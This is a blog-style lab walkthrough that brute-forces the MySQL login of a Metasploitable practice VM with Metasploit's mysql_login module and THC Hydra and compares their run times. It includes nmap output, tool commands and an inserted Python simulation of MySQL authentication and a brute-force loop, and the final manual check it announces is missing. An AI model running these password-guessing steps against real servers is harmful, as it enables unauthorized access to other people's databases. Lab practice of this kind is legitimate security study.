Sunday, 15 January 2012

Brute Forcing MySQL

I just did my first nmap scan against the Metasploitable Virtual Machine. There are several open ports and a lot of services running on the VM. Here is a listing of the services found by nmap:

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

First I wanted to execute some brute-force attacks against the MySQL database running in Metasploitable. There are different ways of brute-forcing it, but any scanner is only as good as the username and password lists (or username/password combination files) you feed it (username and password lists for a first shot are available online, for example from skullsecurity.org).

As the password list I'm using elitehacker.txt.bz2 from skullsecurity.org, and I defined six different users:


root@bt:~/test_environment/brute_force# cat username.txt 
admin
root
mysql
db
test
user


I also inserted all six of these users and a blank line into the elitehacker.txt password file.


1. Using Metasploit

#msfconsole
#search mysql
#use auxiliary/scanner/mysql/mysql_login
#show options
#set RHOSTS <Target IP>
#set USER_FILE /root/<your_username_file>
#set PASS_FILE /root/<your_password_file>
#exploit


Verbose mode is set to true by default, so you see every single login attempt. This is not very convenient, for two reasons:

a) If the brute force is successful you have to scroll back through the whole list of attempts to find the valid login, because the mysql_login module prints no summary when it finishes (which can be very nasty with a long list).
b) The scan takes dramatically longer. When I was scanning with verbose set to true, it took me 5 minutes 5 seconds. After deactivating verbose mode, the scan was done in 2 minutes 5 seconds.

Conclusion => #set VERBOSE false



2. Using THC Hydra

#hydra -L /root/<your_username_file> -P /root/<your_password_file> <IP> mysql
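What one attempt in either tool actually does on the wire, and why the work is users × passwords, as an added example (my own code, not the post's and not Metasploit's or Hydra's): MySQL 4.1+ native authentication never sends the password. The server greeting carries a 20-byte random salt, the client answers with SHA1(password) XOR SHA1(salt + SHA1(SHA1(password))), and the server checks that token against the SHA1(SHA1(password)) it keeps in mysql.user, so every guess costs a fresh connection and round-trip, which is what the timings in this post measure. The server below is an in-memory stand-in I constructed so the script runs offline; the usernames are the post's six, the three-word list is a constructed stand-in for elitehacker.txt, and the two accounts (root with a blank password, test with a weak one) are planted for the demonstration.

```python
"""Added example: how a MySQL brute-force attempt authenticates, run against a
constructed in-memory server so it works offline.  Not code from the post or
from Metasploit/Hydra."""
import hashlib
import itertools
import os
from typing import Dict, Iterable, List, Tuple


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def stored_password_hash(password: str) -> str:
    """What mysql.user stores for mysql_native_password:
    '*' + uppercase hex of SHA1(SHA1(password)); an empty string for a blank password."""
    if password == "":
        return ""
    return "*" + sha1(sha1(password.encode())).hex().upper()


def scramble(password: str, salt: bytes) -> bytes:
    """Client auth token sent after the greeting:
    SHA1(password) XOR SHA1(salt + SHA1(SHA1(password))).
    A blank password is answered with an empty token (edge case the post's
    blank line in the wordlist exists to cover)."""
    if password == "":
        return b""
    stage1 = sha1(password.encode())
    stage2 = sha1(stage1)
    mask = sha1(salt + stage2)
    return bytes(a ^ b for a, b in zip(stage1, mask))


class SimulatedMySQLServer:
    """Constructed stand-in for a MySQL server: hands out a fresh salt per
    connection and verifies tokens the way a real server does, knowing only
    SHA1(SHA1(password)), never the password itself."""

    def __init__(self, users: Dict[str, str]):
        self.table = {u: stored_password_hash(p) for u, p in users.items()}  # constructed mysql.user
        self.attempts = 0

    def connect(self) -> bytes:
        return os.urandom(20)  # the random auth-plugin-data in the server greeting

    def authenticate(self, user: str, salt: bytes, token: bytes) -> bool:
        self.attempts += 1
        stored = self.table.get(user)
        if stored is None:
            return False
        if stored == "":
            return token == b""  # blank password: only an empty token passes
        if len(token) != 20:
            return False
        stage2 = bytes.fromhex(stored[1:])
        mask = sha1(salt + stage2)
        stage1 = bytes(a ^ b for a, b in zip(token, mask))  # recovers SHA1(password)
        return sha1(stage1) == stage2


def build_password_list(usernames: Iterable[str], wordlist: Iterable[str]) -> List[str]:
    """The post's recipe: the usernames and a blank line ahead of the downloaded
    list, de-duplicated with order preserved so cheap guesses come first."""
    seen, out = set(), []
    for cand in itertools.chain(usernames, [""], wordlist):
        if cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


def brute_force(server: SimulatedMySQLServer, usernames: Iterable[str],
                passwords: List[str], stop_on_success: bool = True) -> List[Tuple[str, str]]:
    """Try every user/password pair, one connection (new salt) per attempt."""
    found = []
    for user in usernames:
        for pw in passwords:
            salt = server.connect()
            if server.authenticate(user, salt, scramble(pw, salt)):
                found.append((user, pw))
                if stop_on_success:
                    break  # no point trying further passwords for this user
    return found


if __name__ == "__main__":
    users = ["admin", "root", "mysql", "db", "test", "user"]  # the post's username.txt
    words = ["123456", "password", "letmein"]  # constructed stand-in for elitehacker.txt
    target = SimulatedMySQLServer({"root": "", "test": "letmein"})  # planted accounts
    pw_list = build_password_list(users, words)
    print(len(users) * len(pw_list), "combinations")
    print(brute_force(target, users, pw_list))
```

Because the usernames and the blank line sit at the top of the list, a blank or username-as-password account falls within the first few attempts per user instead of after the whole file; with the post's six users and 5,412 combinations that works out to 902 candidate passwords per user. To run this against a real host you would replace SimulatedMySQLServer with a socket that parses the greeting packet and sends the handshake response, which is exactly what mysql_login and hydra's mysql module do.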



3. Result

So here is an overview of the results (all scans were executed with the same username and password files).

Tool                                    Time
mysql_login (verbose mode activated)    5 minutes 5 seconds
mysql_login (verbose mode deactivated)  2 minutes 5 seconds
THC Hydra                               4 minutes 8 seconds

It was just a very small brute-forcing attack (5,412 username/password combinations), but with verbose mode activated in mysql_login, Metasploit took almost 25% more time than Hydra on the same wordlists.

With verbose mode deactivated, mysql_login was by far the fastest of the three runs.

I don't know whether this scales in the same way for a brute force attack with more combinations, but the mysql_login module of Metasploit seems more efficient for MySQL brute forcing than THC Hydra.

So let's check this finding manually:


So now we have another login, for a new attack :-)
